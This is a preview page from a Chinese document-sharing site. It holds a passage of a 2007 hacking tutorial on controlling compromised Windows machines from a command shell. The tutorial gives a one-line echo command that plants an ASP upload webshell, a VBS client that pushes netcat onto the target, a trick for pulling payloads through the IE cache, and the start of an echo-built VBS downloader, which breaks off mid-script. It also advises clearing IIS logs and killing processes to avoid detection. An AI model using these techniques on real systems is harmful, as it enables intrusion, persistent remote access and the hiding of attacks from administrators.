Cmd模式下的入侵技术大全Cmd.docVIP

  1. 1、本文档共4页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
Cmd模式下的入侵技术大全Cmd

Cmd模式下的入侵技术大全Cmd,模式,入侵,技术 2007年05月13日 星期日 13:51前言 Cmd Shell(命令行交互)是黑客永恒的话题.它历史悠久并且长盛不衰. 本文旨在介绍和总结一些在命令行下控制Windows系统的方法.这些方法都是尽可能地利用系统自带的工具实现的. 文件传输 对于溢出漏洞获得的cmd shell.最大的问题就是如何上传文件.由于蠕虫病毒流行.连接ipc$所需要的139或445端口被路由封锁.再加上WinXP系统加强了对ipc$ 的保护.通过ipc$及默认共享上传文件的手段基本无效了.ftp和tftp是两种可行的方法.介于其已被大家熟知.本人就不介绍了.还有三种大家熟悉的办法.作为总结我再提一下: 1.用Echo命令写ASP木马. 前提当然是目标主机上已经安装了IIS. 一般的ASP木马体积较大.不适合直接用echo命令写入文件.这里我提供一个小巧的. 直接给出echo版: @echo ^%with server.createobject(adodb.stream):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile server.mappath(request.querystring(s)),2:end with%^ up.asp 注意.只有一行.中间没有回车符. 生成的up.asp不能用浏览器访问.只能用下面这个脚本: with wscript if .arguments.count3 then .quit url=.arguments(0);amp;?s=;amp;.arguments(2) fn=.arguments(1) end with with createobject(adodb.stream) .type=1:.open:.loadfromfile fn:s=.read:.close end with with createobject(microsoft.xmlhttp) .open post,url,false:.send s wscript.echo .statustext end with 将其保存为up.vbs.假设目标IP为9.up.asp在IIS虚拟根目录下.需要上传的文件为nc.exe.上传后保存为mm.exe.相应的命令是: cscript up.vbs 9/up.asp nc.exe mm.exe 注意.这个命令是在本地命令行中执行的.不要弄错了.另外.通过IIS上传会留日志.要记得清除哦. 2.自动下载到网页缓存中. 例如:start its:/soft/ps.exe 在远程shell中执行上面这个命令后.ps.exe已经下载到目标主机的网页缓存目录中了.然后: cd C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5 dir /s ps[1].exe 于是获得ps.exe的具体位置(每台主机都不一样).如: C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\AB094JIT 的目录 2004-01-24 14:24 49,152 ps[1].exe 1 个文件 49,152 字节 最后: copy AB094JIT\ps[1].exe c:\path\ps.exe del AB094JIT\ps[1].exe 补充说明: 对于以服务为启动方式的后门所提供的shell.其用户身份一般是System.此时网页缓存目录的位置就如例子中所示.如果shell的身份不是System.需要修改Default User为相应的用户名. 本方法会启动一个IE进程.记得要将它杀掉.如果是System身份的shell.不会在本地出现窗口而暴露. 另外.用ms-its代替its效果完全一样. 3.Echo一个脚本下载web资源. 现成的工具是iGet.vbs.我再给出一个含必要容错功能的版本. 仍然是echo版: @echo with wscript:if .arguments.count^2 then .quit:end if dl.vbs @echo set aso=.createobject(adodb.stream):set web=createobject(microsoft.xmlhttp) dl.vbs @echo web.open get,.arguments(0),0:web.send:if web.

文档评论(0)

xy88118 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档